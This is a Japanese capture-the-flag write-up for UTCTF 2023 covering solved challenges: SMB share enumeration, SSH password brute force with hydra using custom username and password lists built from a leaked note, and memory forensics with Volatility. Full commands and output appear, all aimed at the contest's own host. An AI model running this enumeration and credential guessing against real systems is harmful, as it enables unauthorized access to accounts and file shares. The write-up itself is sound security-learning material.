この大会は2023/3/11 9:00(JST)~2023/3/13 9:00(JST)に開催されました。
今回もチームで参戦。結果は2647点で336チーム中81位でした。
自分で解けた問題をWriteupとして書いておきます。
Dry Run (Misc)
Discordに入り、#rulesチャネルでチェックのリアクションをすると、チャネルがたくさん現れた。#announcementsチャネルのメッセージにフラグが書いてあった。
utflag{welc0me_to_utctf!}
A Network Problem - Part 1 (Networking)
$ nc betta.utctf.live 8080 Hi Wade! I am using socat to broadcat this message. Pretty nifty right? --jwalker utflag{meh-netcats-cooler}
utflag{meh-netcats-cooler}
A Network Problem - Part 2 (Networking)
$ smbclient -L betta.utctf.live Password for [WORKGROUP\kali]: Sharename Type Comment --------- ---- ------- WorkShares Disk Sharing of work files BackUps Disk File Backups. IPC$ IPC IPC Service (Samba Server) Reconnecting with SMB1 for workgroup listing. smbXcli_negprot_smb1_done: No compatible protocol selected by server. protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available $ smbclient \\\\betta.utctf.live\\WorkShares Password for [WORKGROUP\kali]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Mar 9 04:45:05 2023 .. D 0 Thu Mar 9 04:45:05 2023 shares D 0 Thu Mar 9 04:45:05 2023 9974088 blocks of size 1024. 6296432 blocks available smb: \> cd shares smb: \shares\> ls . D 0 Thu Mar 9 04:45:05 2023 .. D 0 Thu Mar 9 04:45:05 2023 Advertising D 0 Thu Mar 9 04:45:05 2023 OfficeFun D 0 Thu Mar 9 04:45:05 2023 IT D 0 Thu Mar 9 04:45:05 2023 9974088 blocks of size 1024. 6296436 blocks available smb: \shares\> cd IT smb: \shares\IT\> ls . D 0 Thu Mar 9 04:45:05 2023 .. D 0 Thu Mar 9 04:45:05 2023 Itstuff D 0 Thu Mar 9 04:45:05 2023 9974088 blocks of size 1024. 6296428 blocks available smb: \shares\IT\> cd Itstuff\ smb: \shares\IT\Itstuff\> ls . D 0 Thu Mar 9 04:45:05 2023 .. D 0 Thu Mar 9 04:45:05 2023 notetoIT N 380 Thu Mar 9 04:45:05 2023 9974088 blocks of size 1024. 6296420 blocks available smb: \shares\IT\Itstuff\> get notetoIT getting file \shares\IT\Itstuff\notetoIT of size 380 as notetoIT (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec) smb: \shares\IT\Itstuff\> quit $ cat notetoIT I don't understand the fasination with the magic phrase "abracadabra", but too many people are using them as passwords. Crystal Ball, Wade Coldwater, Jay Walker, and Holly Wood all basically have the same password. Can you please reach out to them and get them to change thier passwords or at least get them append a special character? -- Arty F. utflag{out-of-c0ntrol-access}
utflag{out-of-c0ntrol-access}
A Network Problem - Part 3 (Networking)
Part 2で見たメモにこう書いてあった。
I don't understand the fasination with the magic phrase "abracadabra", but too many people are using them as passwords. Crystal Ball, Wade Coldwater, Jay Walker, and Holly Wood all basically have the same password. Can you please reach out to them and get them to change thier passwords or at least get them append a special character?
これを参考にusernames.txtのリストを作成する。
crystalball crystal.ball crystal_ball cball crybal wadecoldwater wade.coldwater wade_coldwater wcoldwater wadcol jaywalker jay.walker jay_walker jwalker jaywal hollywood holly.wood holly_wood hwood holwoo
さらにpasswords.txtのリストを作成する。
abracadabra abracadabra@ abracadabra% abracadabra+ abracadabra\ abracadabra/ abracadabra' abracadabra! abracadabra# abracadabra$ abracadabra^ abracadabra? abracadabra: abracadabra, abracadabra( abracadabra) abracadabra{ abracadabra} abracadabra[ abracadabra] abracadabra~ abracadabra- abracadabra_
$ hydra -t 2 -L usernames.txt -P passwords.txt ssh://betta.utctf.live:8822 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-11 18:44:11 [DATA] max 2 tasks per 1 server, overall 2 tasks, 460 login tries (l:20/p:23), ~230 tries per task [DATA] attacking ssh://betta.utctf.live:8822/ [STATUS] 22.00 tries/min, 22 tries in 00:01h, 438 to do in 00:20h, 2 active [STATUS] 22.67 tries/min, 68 tries in 00:03h, 392 to do in 00:18h, 2 active [STATUS] 21.43 tries/min, 150 tries in 00:07h, 310 to do in 00:15h, 2 active [8822][ssh] host: betta.utctf.live login: wcoldwater password: abracadabra$ [STATUS] 21.58 tries/min, 259 tries in 00:12h, 201 to do in 00:10h, 2 active [STATUS] 21.29 tries/min, 362 tries in 00:17h, 98 to do in 00:05h, 2 active [STATUS] 21.39 tries/min, 385 tries in 00:18h, 75 to do in 00:04h, 2 active [STATUS] 20.89 tries/min, 397 tries in 00:19h, 63 to do in 00:04h, 2 active [STATUS] 21.00 tries/min, 420 tries in 00:20h, 40 to do in 00:02h, 2 active [STATUS] 21.10 tries/min, 443 tries in 00:21h, 17 to do in 00:01h, 2 active [STATUS] 20.86 tries/min, 459 tries in 00:22h, 1 to do in 00:01h, 2 active 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-11 19:06:41
ログインできるユーザ、パスワードがわかったので、その情報でログインする。
$ ssh wcoldwater@betta.utctf.live -p 8822 wcoldwater@betta.utctf.live's password: utctf{cust0m3d-lsts-rule!} well done! 327f93bdc02d:~$
utctf{cust0m3d-lsts-rule!}
Reading List (Reverse Engineering)
$ strings readingList | grep utflag{ utflag{string_theory_is_a_cosmological_theory_based_on_the_existence_of_cosmic_strings}
utflag{string_theory_is_a_cosmological_theory_based_on_the_existence_of_cosmic_strings}
”Easy” Volatility (Forensics)
シェルコマンドとしてフラグを含んでいるみたいで、UUIDの形式になっているとのこと。
$ zstd -d debian11.core.zst debian11.core.zst : 2138900771 bytes $ zstd -d debian11_5.10.0-21.json.zst debian11_5.10.0-21.json.zst: 33329346 bytes $ mv debian11_5.10.0-21.json volatility3/symbols $ python3 vol.py -f debian11.core linux.bash Volatility 3 Framework 2.4.1 Progress: 100.00 Stacking attempts finished PID Process CommandTime Command 467 bash 2023-03-05 18:21:23.000000 # 08ffea76-b232-4768-a815-3cc1c467e813
08ffea76-b232-4768-a815-3cc1c467e813